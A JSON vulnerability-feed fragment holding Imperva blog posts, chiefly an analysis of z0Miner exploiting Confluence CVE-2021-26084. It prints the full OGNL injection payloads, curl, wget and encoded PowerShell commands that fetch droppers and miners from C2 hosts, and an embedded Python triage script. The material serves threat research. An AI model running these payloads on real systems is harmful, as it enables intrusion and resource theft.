'\"cmd.exe\",\"/c\"' : '\"/bin/sh\",\"-c\"'\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/atlassian_confluence_webwork_ognl_injection.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "impervablog": [{"lastseen": "2021-04-22T20:29:34", "description": "In [Part 1](<https://www.imperva.com/blog/5-ways-your-software-supply-chain-is-out-to-get-you-part-1-vendor-compromise/>) of this series, we explained how and why our software supply chain transfers an extraordinary amount of risk downstream to the organizations and users that trust and depend on it. We also presented evidence suggesting that 2021 may well be the year of the [Software Supply Chain attack](<https://www.imperva.com/learn/application-security/supply-chain-attack/>).\n\nLast time we described the most sophisticated of the supply chain attack methods, a [Vendor Compromise](<https://www.imperva.com/blog/5-ways-your-software-supply-chain-is-out-to-get-you-part-1-vendor-compromise/>). In this post, we cover the exploitation of third-party applications.\n\n### Exploitation of Third Party Applications\n\nAttacks targeting "[zero-days](<https://www.imperva.com/learn/application-security/zero-day-exploit/>)," or unpatched security bugs, in commonly used third-party applications are another example of the risks we assume from our software supply chain.\n\nCreating software is a challenging process. Often, incomplete requirements, incorrect assumptions, and time-to-market pressures result in the delivery of less-than-perfect software. Generally speaking, software developers do a good job of eliminating software bugs that cause the program to fail in catastrophic or obvious ways. Unfortunately, security bugs don\u2019t typically cause catastrophic system failures. 
They simply allow a bad actor to make the software do things it wasn\u2019t intended to do like steal other users\u2019 credentials or read the entire contents of a database.\n\nThe [recent attacks on the Microsoft Exchange Server](<https://krebsonsecurity.com/2021/03/at-least-30000-u-s-organizations-newly-hacked-via-holes-in-microsofts-email-software/>) are just the latest examples of this type of software supply chain attack. In this case, bugs in Exchange Server allowed attackers to read emails and install a web shell. A web shell is typically an additional web page that the attacker uploads to a website. If the attacker can modify a web page on the server, the web shell may be embedded in an existing page. The additional or modified page contains code that allows the attacker to run arbitrary Operating System commands on the webserver, read files in the filesystem, install malware, etc. A web shell offers capabilities similar to a backdoor without having to establish an additional network connection to the webserver.\n\nCompounding the problem, the rapid-fire ability of bad actors to take advantage of software vulnerability disclosures and our own justifiably cautious patch processes create an asymmetry, with predictable results. It\u2019s rare that an organization will be able to deploy a vendor patch the moment it is made available across all of the necessary locations. Employing a [Web Application Firewall](<https://www.imperva.com/products/web-application-firewall-waf/>) to reduce the gap is a common strategy. Even the best WAFs require time to adapt, however, either with a new signature update (that must be developed, tested, and deployed) or with an adjustment to a machine learning model, or manual acknowledgment that an anomaly has been detected and should be blocked in the future. 
Additionally, these \u201cvirtual patches\u201d must be tested in each organization\u2019s environment prior to deployment to ensure they don\u2019t cause unwanted side effects.\n\nThe race to mitigate zero-day attacks through traditional means is increasingly difficult to win. For example, the Zoho ManageEngine Desktop Central zero-day vulnerability (CVE-2020-10189) [was broadly exploited within days](<https://www.tenable.com/blog/cve-2020-10189-deserialization-vulnerability-in-zoho-manageengine-desktop-central-10-patched>) of its public disclosure.\n\n### Imperva RASP\n\nImperva [Runtime Application Self-Protection](<https://www.imperva.com/products/runtime-application-self-protection-rasp/>) (RASP) offers a compelling way forward. Delivered as a lightweight software plugin, RASP attaches to virtually any type of application, whether third-party, open-source or bespoke. Tightly coupled with the application and requiring no external connectivity, RASP protections are applied consistently regardless of where the application is deployed today or in the future. 
Using a positive security approach, RASP mitigates risk from supply chain attacks by neutralizing malicious software activity including unauthorized network calls, file system access, and execution of commands on the underlying host operating system.\n\nPerhaps this is why the National Institute of Standards and Technology recommends the use of RASP in Special Publication 800-53, section SI-7(17), [Security and Privacy Controls for Information Systems and Organizations](<https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r5.pdf>)?\n\nSee [Runtime Application Self-Protection](<https://www.imperva.com/products/runtime-application-self-protection-rasp/>) for yourself.\n\nThe post [5 Ways Your Software Supply Chain is Out to Get You, Part 2: Exploit Third Party Applications](<https://www.imperva.com/blog/5-ways-your-software-supply-chain-is-out-to-get-you-part-2-exploit-third-party-applications/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-22T12:28:49", "type": "impervablog", "title": "5 Ways Your Software Supply Chain is Out to Get You, Part 2: Exploit Third Party Applications", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", 
"accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10189"], "modified": "2021-04-22T12:28:49", "id": "IMPERVABLOG:A1972445B3E03EDA92E53FFFBD6771BD", "href": "https://www.imperva.com/blog/5-ways-your-software-supply-chain-is-out-to-get-you-part-2-exploit-third-party-applications/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-29T14:37:27", "description": "Ransomware may have dominated headlines in 2021, but it\u2019s only one of many threats security teams must protect against. We\u2019re taking a look back at 5 top cybersecurity stories of 2021 that practitioners wanted to learn more about.\n\n## [5\\. The State of Security in eCommerce](<https://www.imperva.com/blog/by-the-numbers-the-state-of-security-in-ecommerce/>)\n\n### Why you should learn more about this\n\nThe global pandemic has pushed more consumers online and forced the acceleration of growth in eCommerce. The threat landscape for eCommerce websites has never been larger or more complex, with bad bot traffic being the principal problem, accounting for 57% of all attacks on online retail websites in 2021. In addition to stopping ordinary eCommerce transactions, about a third of attacks on web applications on retail websites resulted in data leakage. And with 83% of retail websites running third-party JavaScript-based services executing on the client-side, application developers are creating blind spots in securing the services they need to protect.\n\n### What can eCommerce enterprises do?\n\nIn addition to [Advanced Bot Protection](<https://www.imperva.com/products/advanced-bot-protection-management/>), security practitioners may also consider [Client-Side Protection](<https://www.imperva.com/products/client-side-protection/>) that provides visibility into JavaScript services executing on a website at any given moment. 
This solution automatically scans for existing and newly added services, eliminating the risk of them being a blind spot for security. Client-Side Protection enables you to allow approved domains while blocking unapproved ones and ensures your customers\u2019 sensitive information doesn\u2019t end up being transferred to unauthorized locations and that no fraudsters are exploiting your visitors.\n\n## [4\\. How Imperva Is Protecting Customers & Staying Ahead of CVE-2021-44228](<https://www.imperva.com/blog/how-were-protecting-customers-staying-ahead-of-cve-2021-44228/>)\n\n### Why you should learn more about this\n\nCVE-2021-44228 allows for unauthenticated remote code execution and is having a big impact on all organizations running Java workloads. Security teams are scrambling to immediately patch their software and upgrade third-party components to meet SLAs. Initial attack peaks reached roughly 280K/hour and as with other CVEs in its class, we expect to see this number grow, especially as new variants are created and discovered over the coming days and weeks.\n\n### What can security practitioners do?\n\n[Runtime Application Self-Protection](<https://www.imperva.com/products/runtime-application-self-protection-rasp/>) (RASP) offers a defense-in-depth strategy for enterprises to protect their applications and APIs on a broad front. Many Imperva customers that have deployed RASP have saved thousands of hours in emergency patching and made their secure software development lifecycle faster. Customers that have RASP deployed across their Java applications are protected from RCEs related to CVE-2021-44228.\n\n## [3\\. The ad blocker that injects ads](<https://www.imperva.com/blog/the-ad-blocker-that-injects-ads/>)\n\n### Why you should learn more about this\n\nAd injection is the process of inserting unauthorized advertisements into a publisher\u2019s web page with the intention of enticing the user to click on them. 
Ad injectors are often made by scammers trying to make money from application downloads. They can generate revenue for their creators by serving ads and stealing advertising impressions from other websites. With many people spending more time browsing the web, deceptive ad injection is a growing concern. Attackers are constantly refining their tactics, techniques, and procedures.\n\n### What can security practitioners do?\n\nMalicious JavaScript files, including ad injection scripts, are still widespread on the Internet despite worldwide efforts among security practitioners to make the web safer. Imperva [Client-Side Protection](<https://www.imperva.com/products/client-side-protection/>) enables customers to block such malicious JavaScript threats. The solution provides security teams with visibility and insights into the JavaScript-based services running on their websites, as well as the ability to block unwanted services from executing.\n\n## [2\\. Attackers exploit CVE-2021-26084 for XMRig crypto mining on affected Confluence servers](<https://www.imperva.com/blog/attackers-exploit-cve-2021-26084-for-xmrig-crypto-mining-on-affected-confluence-servers/>)\n\n### Why you should learn more about this\n\nRemote Code Execution (RCE) vulnerabilities can easily allow threat actors to exploit affected systems for easy monetary gain by installing cryptocurrency miners and masking their activity, thus abusing the processing resources of the target.\n\n### What can security practitioners do?\n\nWith [Imperva Cloud Web Application Firewall](<https://www.imperva.com/products/web-application-firewall-waf/>), security practitioners can see a CVE\u2019s activity in Imperva Attack Analytics. Also, given the nature of how [Imperva Runtime Application Self-Protection](<https://www.imperva.com/products/runtime-application-self-protection-rasp/>) works, RCEs can be stopped without requiring any code changes or policy updates. 
Applications of all kinds (active, legacy, third-party, APIs, etc.) are protected when RASP is actively deployed.\n\n## [1\\. 5 elements to include in a cybersecurity strategy for any size business](<https://www.imperva.com/blog/5-elements-to-include-in-a-cybersecurity-strategy-for-any-size-business/>)\n\n### Why you should learn more about this\n\nCybercriminals don\u2019t care how big your business is. If there is a way to separate you from your data or put a wrench in the works of your web applications by launching an automated attack, they will figure out a way to do that. If not directly through your site, then through the software supply chain or through your website visitors. Today, you shouldn\u2019t depend on your developers to build water-tight web application code, your ISP to protect you from a DDoS attack, or your compliance audit checkbox to protect you from a data breach. The threat landscape has progressed far beyond these notions.\n\n### What can security practitioners do?\n\nWe strongly recommend working with [cybersecurity experts](<https://www.imperva.com/contact-us/>) to accurately evaluate your specific threat landscape and help you build a sustainable data security strategy for today and the future.\n\nThe post [2021 in Review, Part 2: 5 Top Cybersecurity Stories](<https://www.imperva.com/blog/2021-in-review-part-2-5-top-cybersecurity-stories/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-29T12:03:19", "type": "impervablog", "title": "2021 in Review, Part 2: 5 Top Cybersecurity Stories", 
"bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2021-44228"], "modified": "2021-12-29T12:03:19", "id": "IMPERVABLOG:7CB37AC69862942C5D316E69A7815579", "href": "https://www.imperva.com/blog/2021-in-review-part-2-5-top-cybersecurity-stories/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-13T20:35:04", "description": "## Vulnerability Overview\n\nOn August 25, 2021 [a security advisory was released](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) for a vulnerability identified in Confluence Server titled \u201cCVE-2021-26084: Atlassian Confluence OGNL Injection\u201d.\n\nThe vulnerability allows an unauthenticated attacker to perform remote command execution by taking advantage of an insecure handling of OGNL (Object-Graph Navigation Language) on affected Confluence servers.\n\nSoon after the publication, various POC/Exploits were published online - at the time of writing this blog there are 32 Github repositories available for CVE-2021-26084.\n\nBesides the publicly available exploits (attempts at executing them were already detected on our systems), Imperva security researchers were able to identify attackers\u2019 attempts to exploit this vulnerability in order to install and run the XMRig cryptocurrency miner on affected Confluence servers running on Windows and Linux systems.\n\n## Analysis\n\n### Attacker Methodology\n\nAs mentioned above we were able to detect 
payloads targeting Windows and Linux Confluence servers.\n\nIn both cases, the attacker is using the same methodology in exploiting a vulnerable Confluence Server.\n\n * Attacker determines the target operating system and downloads Linux Shell/Windows Powershell dropper scripts from a remote C&C server, and writes them into a writable location on the affected system (under /tmp on Linux and $env:TMP system variable on Windows).\n * Executing downloaded dropper scripts.\n * Dropper Scripts perform the following actions to download, install and execute the XMRig crypto mining files: \n * Removal of competing crypto mining processes and their related files.\n * Establishing persistence by adding a crontab/scheduled task based on the operating system.\n * Download of the XMRig crypto mining files and post-exploitation clean up scripts. The files are written to temporary locations, masked as legitimate services/executables.\n * Starting XMRig mining.\n * Execution of post-exploitation scripts.\n\n### Downloaded Dropper Scripts\n\nThe following malicious payload was observed on our monitoring systems: \nqueryString=aaaaaaaa'+{Class.forName('javax.script.ScriptEngineManager') .newInstance().getEngineByName('JavaScript').eval('var isWin = \njava.lang.System.getProperty("os.name").toLowerCase().contains("win"); \nvar cmd = new java.lang.String("curl -fsSL \nhxxp://27.1.1.34:8080/docs/s/26084.txt -o /tmp/.solrg");var p = new \njava.lang.ProcessBuilder(); if(isWin){p.command("cmd.exe", "/c", cmd); \n} else{p.command("bash", "-c", cmd); }p.redirectErrorStream(true); var \nprocess= p.start(); var inputStreamReader = new \njava.io.InputStreamReader(process.getInputStream()); \nvar bufferedReader = new java.io.BufferedReader(inputStreamReader); var \nline = ""; var output = ""; while((line = bufferedReader.readLine()) \n!= null){output = output + line + java.lang.Character.toString(10); \n}')}+'\n\nFrom the sample above we see the attacker is attempting to determine the 
vulnerable server operating system by calling java.lang.System.getProperty("os.name"):\n\nOnce the operating system is determined, a file is downloaded from a remote source using either curl, as in the example above, or PowerShell:\n\nDownload of a Linux shell dropper script: \nvar cmd = new java.lang.String("**curl -fsSL hxxp://27.1.1.34:8080/docs/s/26084.txt -o /tmp/.solrg**");\n\nDownload of a Windows PowerShell dropper script: \nvar cmd = new java.lang.String(**"powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC \n4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAo \nACcAaAB0AHQAcAA6AC8ALwAyADcALgAxAC4AMQAuADMANAA6ADgAMAA4ADAALwBkAG8AYw \nBzAC8AcwAvAHMAeQBzAC4AcABzADEAJwApAA=="**);\n\nThe PowerShell argument is base64 over UTF-16LE (the -enc form); decoded, it is the following one-liner, which downloads sys.ps1 and runs it through Invoke-Expression: \nIEX (New-Object System.Net.Webclient).DownloadString('hxxp://27.1.1.34:8080/docs/s/sys.ps1')\n\nShell dropper script: \ncurl -fsSL hxxp://27.1.1.34:8080/docs/s/26084.txt -o /tmp/.solrg \nPost-exploitation clean-up scripts, linked from the dropper, that remove all traces of the dropper script mentioned above: \ncurl -fsSL hxxp://27.1.1.34:8080/docs/s/kg.txt -o /tmp/.solrx \ncurl -fsSL hxxp://27.1.1.34:8080/docs/s/kk.txt -o /tmp/.solrx \ncurl -fsSL hxxp://27.1.1.34:8080/docs/s/kill.sh -o /tmp/.{random_string}\n\n### Executing Downloaded Dropper Scripts\n\nThe downloaded dropper scripts are executed using a payload similar to the one found in the vulnerable querystring parameter shown above.\n\nBelow is one example where, again, the attacker selects the code execution command based on the operating system detected on the affected server: \nqueryString=aaaaaaaa'+{Class.forName('javax.script.ScriptEngineManager \n').newInstance().getEngineByName('JavaScript').eval('var isWin = 
\njava.lang.System.getProperty("os.name").toLowerCase().contains("win"); \n**var cmd = new java.lang.String("bash /tmp/.solrg**");var p = new \njava.lang.ProcessBuilder(); if(isWin){p.command("cmd.exe", "/c", cmd); \n} else{p.command("bash", "-c", cmd); }p.redirectErrorStream(true); var \nprocess= p.start(); var inputStreamReader = new \njava.io.InputStreamReader(process.getInputStream()); var \nbufferedReader = new java.io.BufferedReader(inputStreamReader); var \nline = ""; var output = ""; while((line = bufferedReader.readLine()) \n!= null){output = output + line + java.lang.Character.toString(10); \n}')}+'\n\n### Dropper Script Analysis\n\nAs mentioned earlier, the first part of each dropper script removes competing crypto mining processes and their related files.\n\nOn Linux systems: (shown as an image in the original post)\n\nOn Windows systems: (shown as an image in the original post)\n\nIn the next step, the script establishes persistence by adding a crontab entry or scheduled task, and downloads additional files from publicly available platforms that sometimes host malware (pastebin).\n\nOn Linux systems: (shown as an image in the original post)\n\nOn Windows systems: (shown as an image in the original post)\n\nThe script then downloads the XMRig cryptocurrency miner files.\n\nThe files are written to temporary locations, masked as legitimate services/executables.\n\nFinally, the script starts XMRig mining; the post-exploitation scripts are executed separately.\n\nThe set of actions described above is carried out differently depending on the target operating system.\n\nOn Linux systems:\n\nDownloaded XMRig cryptocurrency miner files: \ncurl -fsSL hxxp://27[.]1[.]1[.]34[:]8080/docs/s/config.json -o /tmp/.solr/config.json - Miner config file \ncurl -fsSL hxxp://222[.]122[.]47[.]27[:]2143/auth/solrd.exe -o /tmp/.solr/solrd - XMRig miner \ncurl -fsSL hxxp://27[.]1[.]1[.]34[:]8080/docs/s/solr.sh -o /tmp/.solr/solr.sh - XMRig miner starter script\n\nThe script then executes the solr.sh miner starter script, which in turn executes solrd, the XMRig miner binary that starts the 
mining process.\n\nOn Windows systems: \nFirst some variables are set, followed by a custom function (Update($url,$path,$proc_name)) that downloads files using the WebClient.DownloadFile method of a System.Net.WebClient object, \nwhich is used later in the script:\n\nXMRig miner executable, miner name and path: \n$miner_url = "hxxp://222[.]122[.]47[.]27[:]2143/auth/xmrig.exe" \n$miner_name = "javae" \n$miner_path = "$env:TMP\\javae.exe" \n\n\nMiner configuration file, name and path: \n$miner_cfg_url = "hxxp://27[.]1[.]1[.]34[:]8080/docs/s/config.json" \n$miner_cfg_name = "config.json" \n$miner_cfg_path = "$env:TMP\\config.json" \n\n\nClean-up batch script (clean.bat), name and path: \n$killmodule_url = "hxxp://27[.]1[.]1[.]34[:]8080/examples/clean.bat" \n$killmodule_name = "clean.bat" \n$killmodule_path = "$env:TMP\\clean.bat" \n\n\nAfter the variables are set, the script performs the following actions:\n\nClears the System File, Hidden File and Read-Only attributes on any previously installed miner configuration files (config.json), and deletes the related files and folders. \nUsing the custom Update function, downloads the miner executable and config files, passing the variables set earlier to that function. \nSets the System File, Hidden File and Read-Only attributes on the newly downloaded miner files, and starts the miner process.\n\nThe last step executes the clean-up batch script and terminates the powershell.exe process.\n\n### Attacker Origin\n\nThe threat actors\u2019 TTPs (tactics, techniques and procedures) aren\u2019t new, and we\u2019ve seen similar attack campaigns in the past. Based on the data we observed, including downloaders, payloads, configuration, C&C servers and more, we identified a known threat actor that is tied to previous attack campaigns going back as far as March 2021.\n\nThe C&C 27[.]1[.]1[.]34[:]8080 has previously been associated with the z0Miner botnet. 
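The two stages quoted above (a curl download on Linux, a base64 `-enc` PowerShell stager on Windows) lend themselves to mechanical triage. The following Python helper is an added example, not Imperva's tooling: it takes the raw value of the injected queryString parameter, confirms the ScriptEngineManager/ProcessBuilder stub is present, pulls the command out of `new java.lang.String("...")`, decodes a `-enc` argument (base64 over UTF-16LE) and lists the download URLs in defanged form. The two sample values are constructed from the excerpts in this post, with the JavaScript stub trimmed to the part triage needs; the base64 string is the one quoted above, joined across the line breaks.

```python
"""Triage helper for the CVE-2021-26084 ScriptEngine payloads quoted above.

Added example; not Imperva's detection logic. Input is the raw value of the
injected ``queryString`` parameter. Output: whether the ScriptEngineManager
stub is present, the OS commands it would run, the decoded form of any
``powershell -enc`` argument, and the download URLs, defanged.
"""
import base64
import re
from urllib.parse import unquote

# Strings that identify the ScriptEngineManager/ProcessBuilder stub.
STUB_MARKERS = ("Class.forName(", "javax.script.ScriptEngineManager",
                "java.lang.ProcessBuilder")

# new java.lang.String("...")  -> capture the quoted command (\" escapes allowed)
CMD_RE = re.compile(r'java\.lang\.String\("((?:[^"\\]|\\.)*)"\)')
# powershell -enc <base64>  (also -e and -EncodedCommand)
ENC_RE = re.compile(r'powershell(?:\.exe)?\s+-(?:enc|e|encodedcommand)\s+([A-Za-z0-9+/=]+)', re.I)
# http(s) or hxxp(s) URL, ending at whitespace, a quote or a closing paren
URL_RE = re.compile(r'h(?:tt|xx)ps?://[^\s\'")]+', re.I)


def is_scriptengine_stub(param_value):
    """True if the (URL-decoded) parameter carries the stub used by these payloads."""
    v = unquote(param_value)
    return all(marker in v for marker in STUB_MARKERS)


def extract_commands(param_value):
    """Commands handed to ProcessBuilder via new java.lang.String("...")."""
    v = unquote(param_value)
    return [m.group(1).replace('\\"', '"') for m in CMD_RE.finditer(v)]


def decode_encoded_command(command):
    """Decode 'powershell -enc <b64>' (base64 over UTF-16LE); None if not encoded."""
    m = ENC_RE.search(command)
    if not m:
        return None
    raw = base64.b64decode(m.group(1), validate=True)
    return raw.decode("utf-16-le").rstrip("\x00")


def defang(url):
    """http://1.2.3.4/x -> hxxp://1[.]2[.]3[.]4/x (only the host part is bracketed)."""
    scheme, rest = url.split("://", 1)
    host, sep, path = rest.partition("/")
    return "hxxp" + scheme[4:].lower() + "://" + host.replace(".", "[.]") + sep + path


def triage(param_value):
    """Summarise one injected queryString value."""
    report = {"stub": is_scriptengine_stub(param_value), "commands": [], "urls": []}
    for command in extract_commands(param_value):
        decoded = decode_encoded_command(command)
        report["commands"].append({"command": command, "decoded": decoded})
        for text in (command, decoded or ""):
            for url in URL_RE.findall(text):
                if defang(url) not in report["urls"]:
                    report["urls"].append(defang(url))
    return report


# Constructed samples, rebuilt from the excerpts in the post (stub trimmed to the
# part triage needs); they are not live captures.
STUB_HEAD = ("aaaaaaaa'+{Class.forName('javax.script.ScriptEngineManager').newInstance()"
             ".getEngineByName('JavaScript').eval('var isWin = java.lang.System"
             ".getProperty(\"os.name\").toLowerCase().contains(\"win\"); ")
STUB_TAIL = ("var p = new java.lang.ProcessBuilder(); if(isWin){p.command(\"cmd.exe\", \"/c\", cmd); "
             "} else{p.command(\"bash\", \"-c\", cmd); } p.start();')}+'")
LINUX_STAGE = (STUB_HEAD
               + 'var cmd = new java.lang.String("curl -fsSL hxxp://27.1.1.34:8080/docs/s/26084.txt -o /tmp/.solrg");'
               + STUB_TAIL)
ENC_ARG = ("SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQAu"
           "AEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAyADcALgAxAC4AMQAuADMANAA6ADgAMAA4"
           "ADAALwBkAG8AYwBzAC8AcwAvAHMAeQBzAC4AcABzADEAJwApAA==")
WINDOWS_STAGE = STUB_HEAD + 'var cmd = new java.lang.String("powershell -enc ' + ENC_ARG + '");' + STUB_TAIL

if __name__ == "__main__":
    for name, stage in (("linux", LINUX_STAGE), ("windows", WINDOWS_STAGE)):
        print(name, triage(stage))
```

The decoder deliberately only unwraps one layer: a stager that is itself base64 inside the downloaded sys.ps1 is out of scope here, and the defanged URLs are what you would feed to a block list or a retro-hunt.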
\nz0Miner is a malicious mining family that became active last year (2020) and has been publicly analyzed by the [Tencent Security Team](<https://s.tencent.com/research/report/1170.html>).\n\nIt was found that the attackers exploited two Oracle WebLogic RCE vulnerabilities (CVE-2020-14882 and CVE-2020-14883), using the same methodology as described earlier to install XMRig crypto miners on affected systems.\n\nIn past cases it was found that the same botnet was exploiting an ElasticSearch RCE vulnerability (CVE-2015-1427) and an older RCE impacting Jenkins servers, using the same methodology.\n\nOur findings lead us to believe that the same z0Miner botnet is actively exploiting CVE-2021-26084 for XMRig crypto mining.\n\n### Other Identified Payloads\n\nOther payloads were observed on our monitoring systems attempting to exploit CVE-2021-26084, and were identified as:\n\nMuhstik IoT botnet activity \ncurl -s 194[.]31[.]52[.]174/conf2||wget -qO - \n194[.]31[.]52[.]174/conf2\n\nThe following research was conducted about this identified bot activity:\n\n> [Muhstik Takes Aim at Confluence CVE 2021-26084](<https://www.lacework.com/blog/muhstik-takes-aim-at-confluence-cve-2021-26084/>)\n\nVirusTotal identified the following payloads as:\n\nBillGates Botnet \ncurl -O hxxp://213[.]202[.]230[.]103/syna;wget \nhxxp://213[.]202[.]230[.]103/syna\n\nDofloo Trojan \ncurl -O hxxp://213[.]202[.]230[.]103/quu;wget \nhxxp://213[.]202[.]230[.]103/quu\n\n## Summary\n\nAs is often the case with RCE vulnerabilities, attackers rush to exploit affected systems for their own gain. RCE vulnerabilities can easily allow threat actors to exploit affected systems for easy monetary gain by installing cryptocurrency miners and masking their activity, thus abusing the processing resources of the target.\n\nOnce CVE-2021-26084 was publicly disclosed, the Imperva Threat Research team immediately began work on a mitigation. 
It was soon found out that protection against the vulnerability was already provided Out-Of-The-Box.\n\nThe post [Attackers exploit CVE-2021-26084 for XMRig crypto mining on affected Confluence servers](<https://www.imperva.com/blog/attackers-exploit-cve-2021-26084-for-xmrig-crypto-mining-on-affected-confluence-servers/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-13T14:57:52", "type": "impervablog", "title": "Attackers exploit CVE-2021-26084 for XMRig crypto mining on affected Confluence servers", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1427", "CVE-2020-14882", "CVE-2020-14883", "CVE-2021-26084"], "modified": "2021-09-13T14:57:52", "id": "IMPERVABLOG:85E1B351EDAA80DF81632A8B8BD07634", "href": "https://www.imperva.com/blog/attackers-exploit-cve-2021-26084-for-xmrig-crypto-mining-on-affected-confluence-servers/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "srcincite": [{"lastseen": "2022-04-20T17:15:52", "description": "**Vulnerability Details:**\n\nThis vulnerability allows remote 
attackers to execute arbitrary code on affected installations of ManageEngine Desktop Central. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the FileStorage class. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code under the context of SYSTEM.\n\n**Affected Vendors:**\n\nManageEngine\n\n**Affected Products:**\n\nDesktop Central\n\n**Vendor Response:**\n\nManageEngine has issued an update to correct this vulnerability. More details can be found at: \n<https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html>\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-12-12T00:00:00", "type": "srcincite", "title": "SRC-2020-0011 : ManageEngine Desktop Central FileStorage getChartImage Deserialization of Untrusted Data Remote Code Execution Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10189"], "modified": "2020-03-06T00:00:00", "id": "SRC-2020-0011", 
